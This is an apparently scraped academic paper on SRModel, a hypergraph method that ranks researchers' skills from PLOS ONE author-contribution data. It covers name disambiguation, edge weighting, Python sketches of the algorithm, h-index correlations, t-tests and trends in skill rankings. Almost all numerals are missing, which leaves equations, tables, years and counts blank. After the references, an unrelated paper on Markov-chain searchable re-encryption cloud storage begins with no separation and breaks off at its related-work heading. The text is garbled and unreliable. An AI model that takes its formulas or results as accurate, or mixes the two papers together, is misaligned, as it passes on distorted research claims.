https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in fig. a is demonstrated in fig. b. in hh, x is a set of hybrid nodes, composed by researcher, skill and field. eh is hyperedge on x, and wh is a weight function of hyperedge. for the relationships between researcher, field and skill, a hyperedge exists only if the researcher processes the skill in this field. we define the weight function of hyperedge inspired by the laplace kernel function, and the distance calculation method in (huang et al., ). the weight function is: w (vrk,v f i ,v s j )=e ,and ( ) = w (vsj ,v f i ) ·w + w (vrk,v f i ) ·w + w (vrk,v s j ) ·w , ( ) where w ,w and w are the average edge weights between fields and skills, researchers and fields, researchers and skills, respectively. based on the above definition and introduction, our srmodel has been formulated. the value of skill ranking of a researcher is calculated by the weight of the hyperedge in the hypergraph. experiment setting in this section, we introduce the dataset we used in our experiment. then, we construct the hypergraph and get the skill sets as well as the skill ranking of researchers. dataset construction previous studies on researcher evaluation usually use datasets of publications to evaluate their methods. these datasets include digital bibliography & library project (dblp), american physical society (aps), microsoft academic graph (mag). however, authors’ skills are unavailable in those prevalent datasets. 
in the previous work where skills are required, such as team formation problem, team member replacement, collaborators recommendation, researchers usually use terms extracted from keywords, title (farhadi et al., ) or conference and journal name (li et al., ) instead of authors’ real skills. either terms in titles or journal names have limitations to reflect skills of researchers, because the division of the work is not clear. however, there are several journals providing authors’ contribution statement, such as the british medical journal, nature, lancet. besides, journals such as the febs journal and plos journals require authors to declare their contributions in a specified format while submitting the paper. we create a dataset by crawling papers’ information together with their research fields and authors’ individual contributions from the plos one journal website to validate our model, as we mentioned in the background section. plos one journal is an open-access journal, so we can extract information from their website by parsing their html pages of each paper with python. the contribution information of this journal has been used to analyze the authors’ contribution pattern recently (corrêa jr. et al., ; sauermann & haeussler, ). the details of our dataset are shown in table . at first, we remove papers with incomplete information. in the raw dataset, , kinds of contributions are found, and most of them have similar meanings. plos journals recently adopted the credit kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected plos one dataset. items raw preprocessed time span - . - . # field # paper , , # author , , # contribution , taxonomy providing standardized and fine-grained information of authors’ contribution (atkins, ), but there are no standard rules for naming paper’s contributions in the early years. using the raw contribution directly may bring inaccuracy. there are items appearing more than times accounting for the vast majority (about %). thus, we cluster kinds of contributions that appear frequently into categories manually. the categories are shown in table . here, we regard these categories of contributions as skills of researchers. the acronyms of authors’ name followed the contributions on the plos one web pages. we match the acronyms up with authors’ full name in author list of each paper. then we get the authors’ skills in every paper. another vital step is name disambiguation. multiple authors may share the same name, and there is no unique identifier for each author in plos one journal. it can cause confusion and even fault if we regard those authors with the same name as one person. many works have employed a variety of features to distinguish authors sharing the same name, such as affiliations, coauthors, topics or research interests (kang et al., ; ferreira, gonçalves & laender, ). to distinguish authors in plos one dataset, the following features are adopted: (i) affiliation: authors with the same name and the same affiliation are regarded as the same authors; (ii) coauthor: if two authors m and m with the same name coauthored one or more papers with a third author n , it is likely that m and m are the same author named m. we combine these two features to disambiguate the authors’ name. there are , authors in the raw dataset, and , authors after naming disambiguation. 
network construction

to construct the srmodel framework using the plos one dataset, our experiment consists of four main parts:
1. construct a heterogeneous network with three kinds of vertices and three kinds of edges.
2. compute the edge weights according to eqs. ( )–( ).
3. build a hypergraph hh = (x, eh, wh) and compute the hyperedge weights using eq. ( ).
4. calculate the researchers' yearly skill rankings w_i from to , respectively.

in the first step, we construct a heterogeneous network including three kinds of vertices and three kinds of relationships. an edge between a researcher and a field/skill exists only if he/she published a paper in this field or used this skill at least once. a vertex denoting field v^f_i and a vertex denoting skill v^s_j are connected if one or more papers in field i use skill j. there are , authors, fields and skills in the heterogeneous network, forming , , edges in total. a small counting sketch of this step is given after the table below.

table . the skills and their composed contributions.
- data analysis: analyzed the data, data curation, statistical analysis, interpretation of data, interpreted the data, data interpretation, interpreted data, analysis and interpretation of data, performed statistical analysis, interpretation of the data, performed the statistical analysis
- study and experiments design: conceived and designed the experiments, designed the study, conceived and designed the study, designed the experiments, conceived the study
- experiment performing: performed the experiments, visualization
- paper writing: wrote the paper, writing original draft, wrote the manuscript, contributed to the writing of the manuscript, writing - original draft, drafted the manuscript, wrote the first draft of the manuscript
- software and tools: contributed reagents/materials/analysis tools, software, designed the software used in analysis
- theory analysis: methodology, conceptualization, formal analysis, validation, interpreted the results, interpretation of results
- paper reviewing: writing review & editing, revised the manuscript, writing - review & editing, edited the manuscript, read and approved the final manuscript, reviewed the manuscript, critically revised the manuscript, final approval of the version to be published, etc. ( items in total)
- data collection: investigation, resources, acquisition of data, data collection, collected the data, collected data, obtained permission for use of cell line, sample collection, data acquisition, collected samples, collected the samples
- supervision: supervision, project administration, study supervision, supervised the study, supervised the project, supervised the work
- funding acquisition: funding acquisition, obtained funding, financial support
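the first step can be sketched as a simple counting pass over the paper records; the record layout assumed below (a dict with a field and per-author skill lists) is ours, but the counts it accumulates are exactly the ones the rankings in the next step are computed from.

```python
from collections import Counter

# co-occurrence counts that feed the percentile rankings later on
researcher_field = Counter()   # (researcher, field) -> papers in that field
researcher_skill = Counter()   # (researcher, skill) -> times the skill was used
field_skill = Counter()        # (field, skill)      -> papers using the skill in the field

def add_paper(paper):
    """paper: {"field": ..., "skills_by_author": {author: [skill, ...]}} (assumed layout)."""
    field = paper["field"]
    for author, skills in paper["skills_by_author"].items():
        researcher_field[(author, field)] += 1
        for skill in skills:
            researcher_skill[(author, skill)] += 1
    # a paper contributes once to each (field, skill) pair it uses
    for skill in {s for sk in paper["skills_by_author"].values() for s in sk}:
        field_skill[(field, skill)] += 1
```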
in the second step, we compute the weights of the edges in the constructed network. the weights of the field–skill, researcher–field and researcher–skill edges are computed by eqs. ( )–( ), respectively. we rank the skills in field i by the number of papers in field i that use each skill; for skill j this ranking is denoted \gamma^{sf}_{ji}, and L^{sf}_i is the total number of skills in field i. when calculating the weights between researchers and fields, we assume that the more papers a researcher has published in a field, the more familiar he/she is with that field. thus, we rank the researchers according to the number of papers they published in field i; for researcher k this ranking is denoted \gamma^{rf}_{ki}, and the total number of researchers in field i is L^{rf}_i in eq. ( ). similarly, \gamma^{rs}_{kj} is the ranking of researcher k for skill j by the number of papers he published using this skill, and L^{rs}_j is the total number of researchers using skill j in eq. ( ).

algorithm 1: algorithm to calculate the skill ranking of researchers
input: weights of edges; paper information
output: hyperedge weights
  \bar{w}_1 = avg(skills, fields); \bar{w}_2 = avg(researchers, fields); \bar{w}_3 = avg(researchers, skills);
  hyperedges = list(); hyperweight = dict();
  for paper in dataset do
      add (researcher, field, skill) to hyperedges;
  for (r, f, s) in hyperedges do
      \Delta = w[s, f] / \bar{w}_1 + w[r, f] / \bar{w}_2 + w[r, s] / \bar{w}_3;
      weight = e^{\Delta};
      hyperweight[r, f, s] = weight;
  return hyperweight;

in the third step, we construct the hypergraph and calculate the skill proficiency of authors. a hyperedge connects a researcher, a field and a skill if the researcher published papers in this field using this skill. there are , , hyperedges in the constructed hypergraph in total, and the weight of a hyperedge is calculated by eq. ( ), representing a researcher's skill proficiency in a field. the pseudo-code of the algorithm to calculate the skill ranking is shown in algorithm 1. let e denote the number of hyperedges; the time complexity of constructing the heterogeneous network of skills, fields and researchers is o(e). building the hypergraph on the network and calculating the weights of hyperedges can be performed together, and the time complexity of these two steps is also o(e), so the overall time complexity of our skill ranking method is o(e).

in fact, the skill ranking calculated in the third step is a snapshot at the time when the data are collected. in the last step, we take a snapshot every year to construct a series of hypergraphs and calculate the weights of hyperedges representing the researchers' skill rankings at different times, denoted as w_i, where i ∈ [ , ]. that is, the skill ranking of a researcher in a field at year i is calculated from all the papers he published until year i. we use the yearly skill ranking information to analyze the dynamics of researchers' skill proficiency, and we can also obtain a researcher's abilities in the year when a given paper was published.
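a runnable counterpart of algorithm 1, under the same assumption made in the reconstructed equations above (each pairwise weight is normalized by the corresponding average edge weight before the exponential is applied):

```python
import math

def hyperedge_weights(edge_w_sf, edge_w_rf, edge_w_rs, hyperedges):
    """compute the hyperedge weight for every (researcher, field, skill) triple.
    the three dicts hold the pairwise edge weights keyed by (skill, field),
    (researcher, field) and (researcher, skill); `hyperedges` is an iterable of
    (r, f, s) triples.  a sketch only: the exponent combines the pairwise
    weights normalized by their averages, as reconstructed above."""
    w1 = sum(edge_w_sf.values()) / len(edge_w_sf)   # avg skill-field weight
    w2 = sum(edge_w_rf.values()) / len(edge_w_rf)   # avg researcher-field weight
    w3 = sum(edge_w_rs.values()) / len(edge_w_rs)   # avg researcher-skill weight

    hyperweight = {}
    for r, f, s in hyperedges:
        delta = (edge_w_sf[(s, f)] / w1
                 + edge_w_rf[(r, f)] / w2
                 + edge_w_rs[(r, s)] / w3)
        hyperweight[(r, f, s)] = math.exp(delta)
    return hyperweight
```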
result

we construct the hypergraph model and then calculate the weight of each hyperedge using it. based on the hyperedge weight, we can calculate the skill ranking of a researcher in a field. in this section, we validate the effectiveness of the srmodel and carry out several analyses on the ranking results.

table . correlation coefficient of skill ranking and h-index (skill, correlation coefficient): experiment performing . ; data analysis . ; paper reviewing . ; paper writing . ; supervision . ; theory analysis . ; funding acquisition . ; software and tools . ; study and experiments design . ; data collection . .

validation of srmodel

we computed the correlation coefficient between researchers' skill rankings and their h-indices and performed a hypothesis test to validate our model's performance.

correlation between skill ranking and h-index

to verify the validity of the method and explore the potential relationship between skill ranking and h-index, we analyze how the skill ranking changes as the h-index increases. plos one is a journal mainly focusing on biology: among the , papers we obtained from its website, more than , are in the field of biology, so we use the papers and authors in biology to perform the verification. researchers' skill rankings are calculated from the data in plos one, but only a fraction of each researcher's papers is published in this journal, so it is not reasonable to relate their skill rankings to their real h-indices. instead, we calculate the h-indices of all the authors in the plos one dataset from the papers they published in this journal and their citation counts. the h-indices of authors in the plos one dataset range from to .

pearson's correlation coefficient quantifies the linear correlation between two groups of continuous variables (pearson, ). thus, we calculate the correlation coefficient between skill ranking and h-index, shown in table . all the correlation coefficients are larger than . , especially for the skills "data analysis", "paper writing" and "study and experiments design", whose correlation coefficients are larger than . , indicating a high correlation. this result means that a researcher with a higher h-index often has a higher skill ranking, which suggests that researchers who are more skillful with academic skills can obtain outcomes of higher quality.

we then analyze the distribution of the skill ranking to examine the rationality of the model. the result is shown in fig. (distributions and fitted lines of h-index and skill ranking; the x axes denote the value of h-index and skill ranking, and the y axes denote the numbers). both distribution curves follow an exponential distribution of the form y = e^{a + bx + cx^2}, and the r-square of the two fitted functions is close to , which indicates a high goodness of fit. this means that the researchers' h-index and skill ranking have the same kind of distribution, which also explains the high correlation coefficient between them and the rationality of the srmodel.
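the correlation analysis can be reproduced with scipy as sketched below; the citation lists and skill-ranking values are toy inputs, and the h-index is computed only from the papers in the dataset, as described above.

```python
from scipy.stats import pearsonr

def h_index(citation_counts):
    """largest h such that h papers have at least h citations each."""
    counts = sorted(citation_counts, reverse=True)
    h = 0
    for i, c in enumerate(counts, start=1):
        if c >= i:
            h = i
        else:
            break
    return h

# toy inputs (illustrative only): per-author citation lists and skill rankings
citations_per_author = [[12, 8, 5, 1], [3, 2, 2], [25, 20, 14, 9, 4]]
skill_ranking_per_author = [1.8, 1.2, 2.4]

h_values = [h_index(c) for c in citations_per_author]
rho, p_value = pearsonr(h_values, skill_ranking_per_author)
print(h_values, rho)
```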
relationship between skill ranking and citation

to validate whether the skill ranking computed by our model matters for the quality of a scholar's research outputs, we form the hypothesis that there are differences between the citation counts of papers whose authors have different average skill rankings. we use the single-sided t-test, also known as student's test (gosset, ), to test this hypothesis. in our experiments, we use the papers in biology from to as the sample set. first, we group all papers by their publication year, because citation counts are highly influenced by a paper's age and we only have the citation counts of papers as of . we remove the first three years because we do not have enough papers and researchers in our dataset for those years, and we remove the last two years because the citation counts of those papers are still growing. then, for each paper, we calculate the average skill ranking of the paper's authors in the year they wrote it. we split every yearly group into two parts to perform our test: one part consists of papers whose authors' average skill ranking is less than the median value of the group, and the other contains the rest of the papers. we denote the papers with higher authors' skill ranking by the random variable x_1 and the lower ones by x_2.

we perform a t-test with the settings described above. the null hypothesis is h_0: \mu_1 = \mu_2 and the alternative hypothesis is h_1: \mu_1 > \mu_2, where \mu_1 and \mu_2 are the population means of the two groups of random variables defined above. we use the scipy module in python to run the test (jones, oliphant & peterson, ), which computes both the statistic and the p-value of the t-test with the function scipy.stats.ttest_ind(x_1, x_2, equal_var=true). if the p-value is less than the significance level (typically . ), we can reject the null hypothesis and accept the alternative hypothesis h_1: \mu_1 > \mu_2, which means that the average citation count of papers with higher-skill-ranking authors is larger than that of papers with lower-skill-ranking authors. however, the result of the t-test is sensitive to the equality of the sample variances; if the variances of the two groups are not equal, the result needs to be corrected. so, before performing the t-test on the samples, we run levene's test to assess the equality of the two groups' variances; if the variances are not equal, we set the parameter equal_var=false in the t-test function to avoid deviation.

the average citation counts of the two groups of samples are shown in table (columns: year, avg-low, avg-high, p-value). papers written by authors with relatively low skill ranking have lower average citation counts, and all the p-values of the t-tests are lower than . , which indicates significant differences in the sample means. thus, the skill ranking of authors influences the citation counts of their outputs.
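a compact sketch of the test procedure: levene's test decides whether the equal-variance t-test can be used, and the two-sided p-value returned by scipy.stats.ttest_ind is halved to obtain the one-sided test of h_1: \mu_1 > \mu_2.

```python
from scipy.stats import levene, ttest_ind

def compare_groups(citations_high, citations_low, alpha=0.05):
    """one-sided t-test of H1: mean(high) > mean(low), preceded by levene's
    test for equal variances, as described above."""
    _, p_levene = levene(citations_high, citations_low)
    equal_var = p_levene >= alpha          # keep the pooled test only if variances look equal
    t_stat, p_two_sided = ttest_ind(citations_high, citations_low, equal_var=equal_var)
    # ttest_ind is two-sided; halve the p-value for the one-sided alternative
    p_one_sided = p_two_sided / 2 if t_stat > 0 else 1 - p_two_sided / 2
    return t_stat, p_one_sided
```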
analysis of skill ranking increase

we define a researcher's academic age in the plos one dataset as the number of years between his first and last paper in this dataset. although plos one is a comprehensive journal with a large number of papers, it cannot include all the papers published by every researcher, and many researchers who have published many papers have only one or two in this journal; analyzing the skill rankings of those researchers is meaningless. to avoid this defect of the dataset as much as possible, we choose researchers whose academic ages and numbers of published papers are both in the top %, named "top researchers", to carry out the analysis. in the plos one dataset, there are , top researchers.

we first calculate the yearly change rate of researchers' skill rankings. the yearly change rate indicates how much the skill ranking of a researcher increased or decreased compared with one year before, defined as \delta_i = (w_i - w_{i-1}) / w_{i-1}, where w_i is the value of the skill ranking in year i and w_{i-1} \neq 0. we show the distribution of the yearly change rate in fig. (yearly change rate of top researchers' skills; the x-axis is the number of researcher-field-skill pairs and the y-axis is the change rate; the bars denote the numbers of increasing and decreasing sets at each change rate). the change rate of most researchers' skills is less than %. a slight decrease also exists in some researchers' skill rankings, because the progress of other researchers lowers their relative rankings.

observing the curves of researchers' skills, we found that the skills of most researchers fluctuate upward, but the rising patterns differ. we therefore explore the commonalities and differences in how researchers' different skills change. first, we analyze the rising stages of skills. when a researcher's skill ranking increases by more than % in a year, we call this year a "fast increase year" for that skill. the distribution of the longest continuous rapid-growth period of each researcher-field-skill set is presented in fig. (continuous rapid growth years of researchers' skills; the x-axis denotes the number of continuous rapid growth years and the y-axis denotes the number of researchers' skills; there are , (researcher, field, skill) triples for the , top researchers in total). in this figure, we count the total number of researcher-field-skill sets for different lengths of time. about thousand researcher-field-skill sets experience a one-year rapid growth, and the number for two years drops to around thousand. a few skill sets rise continuously for more than five years, including , sets for years and sets for years. the average number of fast-growing years among the , researcher-field-skill sets of the , researchers is . years. that is, researchers generally spend one or two years putting their energy into one skill to gain a good command of it, and then they may focus on other disciplines or other skills. several reasons account for this phenomenon. first, researchers usually change their research fields during their careers, especially interdisciplinary researchers; the transformation of fields can bring researchers more inspiration and creativity. second, as a researcher becomes more and more skillful, the work he undertakes in the team may change. we then explore the skill transfer of researchers.
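the yearly change rate and the longest run of fast increase years can be computed as below; the percentage threshold for a "fast increase year" is elided in the text, so the 10% used here is only an illustrative assumption.

```python
def yearly_change_rates(rankings_by_year):
    """rankings_by_year: ordered list of a researcher's skill-ranking values,
    one per year.  returns the relative change rate for each consecutive pair."""
    rates = []
    for prev, cur in zip(rankings_by_year, rankings_by_year[1:]):
        if prev != 0:
            rates.append((cur - prev) / prev)
    return rates

def longest_fast_increase_run(rates, threshold=0.10):
    """length of the longest run of consecutive 'fast increase years', i.e.
    years whose change rate exceeds the threshold (10% is an assumed value)."""
    best = run = 0
    for r in rates:
        run = run + 1 if r > threshold else 0
        best = max(best, run)
    return best
```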
changing patterns of skill ranking

we then explore the changing patterns of different skills. to investigate how skill rankings change over time, we propose a method to compute the average ranking of each skill in different periods. three problems need to be considered: ( ) researchers' academic ages differ, and the time when they first engage with a skill or field varies; ( ) many researchers did not publish in plos one at the beginning of their academic careers, so studying their skill transfer directly would be unconvincing; ( ) many researchers did not publish papers in plos one every year, and the numbers of papers published by different researchers vary widely. to address these problems, we define a researcher's "academic stage" as the period between years in which he published papers. for example, a researcher m published two, five and one papers in , and , respectively, so he has three academic stages, which are – , – and – . the skill ranking of each stage is indicated by the skill ranking in the first year of the stage.

after obtaining the skill rankings of all stages for all the top researchers, we calculate the average value in each stage for each skill; the result is shown in fig. (average skill ranking in different periods; the x-axis is the stage and the y-axis is the researchers' average skill ranking in each stage). we divide the skills into four groups according to their trends. in the first group (fig. a) there are five skills whose rankings keep increasing throughout all academic stages, with a higher increase rate than the other groups: "paper writing", "data analysis", "study and experiments design", "experiment performing" and "software and tools". this suggests that these five are basic academic skills that remain important for many researchers throughout their academic careers. the second group (fig. b) has two skills, "supervision" and "theory analysis"; their rankings change slowly in the early stages and increase sharply in the later academic stages, which indicates that these two skills require more experience in academia and are harder to develop. the third group (fig. c) includes "paper reviewing" and "data collection"; their rankings rise in the early stages and finally fall slightly, especially "data collection", whose increase rate is very small after the fourth stage. we assume that these two skills are easy to get started with, and that researchers use them less frequently once they have more experience. the remaining skill (fig. d) shows no obvious trend: we think "funding acquisition" has little correlation with time in our dataset; perhaps the time span is not long enough to reveal its changing pattern.

thus, the changing patterns of different skills vary. some skills are easy to get started with; when researchers have more experience, they transfer their interests to other skills. some skills are harder to develop, and researchers need to develop other skills first, so these skills grow in the later academic stages. there are also some basic skills that remain important for many researchers throughout their academic careers.
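a small sketch of the stage bookkeeping, assuming each researcher's publication years and per-stage ranking values have already been extracted; the data layout and the handling of the final stage are ours.

```python
def academic_stages(publication_years, dataset_end):
    """split a researcher's career into 'academic stages': each publication year
    opens a stage that runs until the next publication year, with the last stage
    running to the end of the dataset (matching the three-stage example above)."""
    years = sorted(set(publication_years))
    return list(zip(years, years[1:] + [dataset_end]))

def stage_averages(stage_rankings):
    """stage_rankings maps (skill, stage_index) -> list of per-researcher ranking
    values; returns the average ranking of each skill in each stage."""
    return {key: sum(vals) / len(vals) for key, vals in stage_rankings.items()}
```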
conclusion and future work

in this paper, we carried out both an empirical analysis and a data analysis to identify the factors affecting skill ranking. we then constructed a hypergraph-based model named srmodel to describe the relationships among researchers, skills and fields; this model can be used to rank a researcher's scientific skills. we applied the model to the plos one dataset, which is extracted from the journal website, and obtained the weighted field–skill sets for each researcher. we validated our method by correlation analysis with the h-index and by hypothesis testing, and then used the results to analyze the increase of skill rankings and the patterns of skill ranking change.

skill ranking can be applied to many practical problems, such as collaborator recommendation, team formation, team member replacement and team refinement. in problems where skill similarity is required, a researcher's proficiency in each skill can make the results more precise; in problems where skill grading is needed, a fine-grained method can lead to better results. in future work, we will use our model to solve some practical problems and examine its reliability and effectiveness. datasets from other disciplines, such as software engineering and physics, can be considered to further verify the validity of the model. besides, more factors and relationships will be taken into consideration when ranking skills.

additional information and declarations

funding
this work was supported by the fund for promoting the reform of higher education by using big data technology, energizing teachers and students to explore the future ( a ), the fundamental research funds for the central universities (dut jc ), the liaoning provincial key r&d guidance project ( ), and the liaoning provincial natural fund guidance plan ( ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
using big data technology, energizing teachers and students to explore the future: a .
fundamental research funds for the central universities: dut jc .
liaoning provincial key r&d guidance project: .
liaoning provincial natural fund guidance plan: .

competing interests
xiangjie kong is an academic editor for peerj.

author contributions
• xiangjie kong conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• lei liu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• shuo yu performed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft.
• andong yang analyzed the data, authored or reviewed drafts of the paper, approved the final draft.
• xiaomei bai and bo xu conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft.

data availability
the following information was supplied regarding data availability: the raw code is available in the supplemental file.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
alvarez-rodríguez jm, colomo-palacios r. assessing professional skills in a multi-scale environment by means of graph-based algorithms. in: european network intelligence conference. piscataway: ieee.
anderson ka. skill networks and measures of complex human capital. proceedings of the national academy of sciences of the united states of america.
atkins h. author credit: plos and credit update. the official plos blog. available at https://blogs.plos.org/plos/ / /author-credit-plos-and-credit-update/.
biswal ak. an absolute index (ab-index) to measure a researcher's useful contributions and productivity. plos one.
bornmann l, daniel hd. does the h-index for ranking of scientists really work? scientometrics.
bu j, tan s, chen c, wang c, wu h, zhang l, he x. music recommendation by unified hypergraph: combining social media information and music content. in: acm international conference on multimedia. new york: acm.
corrêa jr ea, silva fn, costa ldf, amancio dr. patterns of authors contribution in scientific manuscripts. journal of informetrics.
dance a. authorship: who's on first? nature.
egghe l. theory and practise of the g-index. scientometrics.
farhadi f, sorkhi m, hashemi s, hamzeh a. an effective expert team formation in social networks based on skill grading. in: ieee international conference on data mining workshops. piscataway: ieee.
ferreira aa, gonçalves ma, laender ah. a brief survey of automatic methods for author name disambiguation. acm sigmod record.
gosset ws. the probable error of a mean. biometrika.
hirsch je. an index to quantify an individual's scientific research output. proceedings of the national academy of sciences of the united states of america.
huang y, liu q, zhang s, metaxas dn. image retrieval via probabilistic hypergraph ranking. in: proceedings of computer vision and pattern recognition. piscataway: ieee.
jones e, oliphant t, peterson p. scipy: open source scientific tools for python. available at http://www.scipy.org/.
kang is, na sh, lee s, jung h, kim p, sung wk, lee jh. on co-authorship for author disambiguation. information processing & management.
kong x, jiang h, wang w, bekele tm, xu z, wang m. exploring dynamic research interest and academic influence for scientific collaborator recommendation. scientometrics.
kong x, jiang h, yang z, xu z, feng x, tolba a. exploiting publication contents and collaboration networks for collaborator recommendation. plos one.
kong x, mao m, wang w, liu j, xu b. voprec: vector representation learning of papers with text information and structural identity for recommendation. ieee transactions on emerging topics in computing.
lee i, xia f, roos g. an observation of research complexity in top universities based on research publications. in: international world wide web conference. new york: acm.
li l, li t. news recommendation via hypergraph learning: encapsulation of user behavior and news content. in: proceedings of the sixth acm international conference on web search and data mining. new york: acm.
li l, tong h, cao n, ehrlich k, lin y-r, buchler n. enhancing team composition in professional networks: problem definitions and fast solutions. ieee transactions on knowledge and data engineering.
liang r, jiang x. scientific ranking over heterogeneous academic hypernetwork. in: thirtieth aaai conference on artificial intelligence. menlo park: aaai.
liu j, dolan p. personalized news recommendation based on click behavior. in: international conference on intelligent user interfaces. new york: acm.
liu z, huang h, wei x, mao x. tri-rank: an authority ranking framework in heterogeneous academic networks by mutual reinforce. in: proceedings of the international conference on tools with artificial intelligence. piscataway: ieee.
meng q, kennedy pj. discovering influential authors in heterogeneous academic networks by a co-ranking method. in: acm international conference on information & knowledge management. new york: acm.
milojević s. principles of scientific research team formation and evolution. proceedings of the national academy of sciences of the united states of america.
nicolini d, mengis j, swan j. understanding the role of objects in cross-disciplinary collaboration. organization science.
pan rk, fortunato s. author impact factor: tracking the dynamics of individual scientific impact. scientific reports.
paul-hus a, mongeon p, sainte-marie m, larivière v. the sum of it all: revealing collaboration patterns by combining authorship and acknowledgements. journal of informetrics.
pearson k. note on regression and inheritance in the case of two parents. proceedings of the royal society b: biological sciences.
persson ra. bibliometric author evaluation through linear regression on the coauthor network. journal of informetrics.
rahman mt, mac regenstein j, kassim nla, haque n. the need to quantify authors' relative intellectual contributions in a multi-author paper. journal of informetrics.
sauermann h, haeussler c. authorship and contribution disclosures. science advances.
sawilowsky ss. s-index: a comprehensive scholar impact index. international review of social sciences & humanities.
sekercioglu ch. quantifying coauthor contributions. science.
sinatra r, wang d, deville p, song c, barabási al. quantifying the evolution of individual scientific impact. science.
suo q, sun s, hajli n, love ped. user ratings analysis in social networks through a hypernetwork method. expert systems with applications.
theodoridis a, kotropoulos c, panagakis y. music recommendation using hypergraphs and group sparsity. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee.
wang w, yu s, bekele tm, kong x, xia f. scientific collaboration patterns vary with scholars' academic ages. scientometrics.
wang x, zhao z, ng w. ustf: a unified system of team formation. ieee transactions on big data.
xia f, wang w, bekele tm, liu h. big scholarly data: a survey. ieee transactions on big data.
yao l, sheng qz, ngu ah, li x. things of interest recommendation by leveraging heterogeneous relations in the internet of things. acm transactions on internet technology.
yegros-yegros a, rafols i, d'este p. does interdisciplinary research lead to higher citation impact? the different effect of proximal and distal interdisciplinarity. plos one.
yu j, tao d, wang m. adaptive hypergraph learning and its application in image classification. ieee transactions on image processing.
zhou w, zhu y, javed f, rahman m, balaji j, mcnair m. quantifying skill relevance to job titles. in: ieee international conference on big data. piscataway: ieee.

international journal of advanced network, monitoring and controls

searchable re-encryption cloud storage method based on markov chain

wang hui a, wang zhongsheng b
school of computer science and engineering, xi'an technological university, xi'an, china
e-mail: a @qq.com; b @qq.com

li jinguang
department of information technology, shaanxi heavy duty automobile co. ltd, xi'an, shaanxi, china

abstract—cloud storage is an emerging paradigm that offers on-demand, flexible, and elastic computational and storage services for terminal users. when the amount of data increases dramatically, the storage efficiency of the system decreases seriously. in this paper, a new method, srecsm (searchable re-encryption cloud storage method) based on markov chain, is proposed. it predicts periodically in stages by using the steady markov strategy, which makes it easy to select the optimal storage node: the data are scheduled to be stored in the node with the lowest cost in real time, and that node is selected to implement cloud storage access on the mobile terminal. by using a searchable re-encryption method, srecsm increases the storage requirement and flexibility while minimizing cost and searching time. the reliability model of srecsm is then established. simulation results show that the srecsm introduced in this paper is able to predict accurately for data of different sizes.
moreover, the influence on storage efficiency is effectively reduced through srecsm when data of different sizes are stored in the storage nodes, regardless of the storage cost. it is verified that the srecsm based on markov chain has higher reliability.

keywords—cloud storage; markov chain; re-encryption; reliability model

i. introduction

in order to meet various storage demands, cloud storage is designed to store data in the cloud and is widely used on the internet. compared with traditional data storage, it greatly improves the efficiency of mass data storage and the utilization of network resources. however, access from a mobile device to data stored in a cloud leads to a poor client quality of experience [ - ]; it is essential to reduce the time a user waits to download a requested file from the network in order to enhance the client quality of experience. as a result, cloud storage techniques are quite challenging. on one hand, the storage density of cloud storage is low and the overall storage efficiency is low; on the other hand, high latency limits the use of mobile cloud storage, especially for applications with frequent random accesses to a large set of small files. therefore, cloud storage faces serious security and efficiency problems [ - ]. traditional cloud storage systems do not adapt well to different application environments and do not guarantee the integrity and confidentiality of cloud data. in other words, the cloud storage service does not guarantee that the data and operations of mobile users will not be lost, damaged, leaked, or illegally exploited, whether maliciously or not; it is therefore very dangerous to store sensitive data directly in the cloud. the reliability of mobile cloud storage depends on the extent of the impact on system storage efficiency when the storage solution fails [ ]. storing sensitive data on an untrusted server is thus a challenging issue [ ]. simple encryption techniques have key management issues and cannot support complex requirements such as querying, parallel modification, and fine-grained authorization. to guarantee confidentiality and proper access control of sensitive data, classical encryption is used [ - ].

to solve the problems caused by the latency and low storage density of traditional storage methods in cloud storage systems, in this paper srecsm, a searchable re-encryption cloud storage method, is proposed using the idea of the markov chain. in this method, instead of traditional reactive storage, a proactive storage approach is adopted to avoid delayed storage. in addition, srecsm predicts periodically to increase the efficiency of cloud storage. the major contributions of our work include:

• a searchable re-encryption cloud storage method based on markov chain is proposed and built as the srecsm model. in order to find the optimal storage policy in the cloud, an optimization problem is formulated as a markov chain. the srecsm model is designed to predict periodically in stages by using the steady markov strategy and to determine the lowest storage cost, by which the storage benefit can be maximized.

• a value iteration algorithm of srecsm is presented for computing the stationary deterministic policy. the data are scheduled to be stored in the node with the lowest storage cost in real time; therefore, the optimal storage node must be selected to implement cloud storage access on the mobile terminal.
• the central idea of the searchable re-encryption is to generate a re-encryption key and to decrypt only when the keyword matches. the objective of the proposed searchable re-encryption method is to increase the storage requirement and flexibility, reduce the security issues and overhead ratio, and minimize the cost and searching time.

• the reliability model of srecsm is proposed and analyzed. because of the large scale of the cloud storage system, the monte carlo simulation method is adopted in the reliability evaluation of the cloud storage system.

• we conduct a series of experiments to validate the effectiveness, performance and robustness of srecsm. the results show that the presented approach can store mass data in the cloud system effectively and securely.

the rest of the paper is organized as follows. section discusses related work. section proposes the searchable re-encryption cloud storage method based on markov chain. section describes the searchable re-encryption method in srecsm. section presents the basic prototype system of srecsm and the simulation experiments, and analyzes the security, performance and robustness of srecsm. section concludes the paper.

ii. related work

